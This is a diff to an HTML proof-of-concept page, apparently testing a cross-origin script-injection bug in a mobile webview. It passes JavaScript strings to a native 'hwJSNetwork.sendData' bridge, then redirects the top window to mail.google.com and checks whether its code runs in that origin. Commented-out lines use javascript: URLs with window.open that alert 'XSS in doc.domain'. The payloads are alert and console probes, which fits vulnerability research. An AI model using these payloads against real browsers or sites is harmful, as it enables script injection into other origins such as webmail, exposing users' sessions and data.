--- a/window-open-iframe-js.html
+++ b/window-open-iframe-js.html
@@ -1,7 +1,7 @@
 <body>
 <script>
-  hwJSNetwork.sendData("https://", "GET", "", "", "document.addEventListener('readystatechange', (e)=>{ console.log(window.location.origin); }); document.addEventListener('DOMContentLoaded', (e)=>{ alert(window.location.origin); }); window.alert('sendData:'+window.location.origin); window.addEventListener('load', (e)=>{ console.log('load'+window.location.origin); }); window.setTimeout(()=> { alert(2) }, 5000); dummy"); 
-//  window.location="https://mail.google.com";
+  hwJSNetwork.sendData("https://", "GET", "", "", "window.setInterval(() => { console.log(window.location.origin); if(window.location.origin.contains('google')) alert(1);}, 10); dummy");
+  window.setTimeout(()=> { top.location="https://mail.google.com"; }, 2000);
 //  window.open('javascript:var elem = document.createElement("p");elem.innerHTML = "<b>Executed JS in parent origin: "+window.location.origin+"</b>"; document.body.append(elem);alert("XSS in doc.domain: "+document.domain+", win.origin: "+window.location.origin)');
 //  window.open("javascript:alert('Executed JS in target '+window.location.origin)");
 //  window.open("https://example.com");
